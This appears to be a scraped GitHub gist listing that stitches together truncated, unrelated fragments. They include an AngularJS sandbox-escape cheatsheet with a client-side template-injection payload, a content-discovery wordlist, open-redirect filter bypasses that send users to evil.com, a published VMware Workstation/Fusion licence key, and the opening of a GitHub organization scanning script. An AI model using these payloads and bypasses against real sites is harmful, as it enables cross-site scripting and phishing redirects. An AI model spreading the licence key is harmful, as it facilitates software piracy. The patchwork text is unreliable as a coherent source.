#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
Juan Felipe Osorio JFOZ1010
🥷
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>I LOVE YOU</title> | |
| <script> | |
| onload = function () { | |
| var d = document; | |
| // フェードイン | |
| function feedin (feed, speed) { | |
| var filter = 0; |
jeremybuis
/ angular.sandbox.escapes.md
Created
January 27, 2016 15:31
Angular Sandbox Escape Cheatsheet
jhaddix
/ content_discovery_all.txt
Created
May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |
-
Simply try to change the domain
Example: ?redirect=https://example.com --> ?redirect=https://evil.com
-
Bypass the filter when protocol is blacklisted using
//Example: ?redirect=https://example.com --> ?redirect=//evil.com
ezracb
/ VMware Workstation Pro and Fusion Pro Licence Keys
Created
April 9, 2021 14:43
VMware Workstation Pro and Fusion Pro Licence Keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Obviously using these keys may be a grey area. I use them for my computer, but there are no guarentees VMware won't sue you if you use them in a commercial environment. | |
| VMware Workstation 16 | |
| YF390-0HF8P-M81RQ-2DXQE-M2UT6 | |
| VMware Fusion Pro 12 | |
| YF390-0HF8P-M81RQ-2DXQE-M2UT6 | |
| As far as I know, this key works on both Fusion and Workstation. |
felipecaon
/ scan_github_organization.sh
Created
May 26, 2025 14:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| while IFS= read -r ORG_NAME; do | |
| echo "[*] Processing organization: $ORG_NAME" | |
| mkdir -p "$ORG_NAME" | |
| cd "$ORG_NAME" || exit | |
| ##################################### | |
| # 1. Clone all non-fork repos | |
| ##################################### |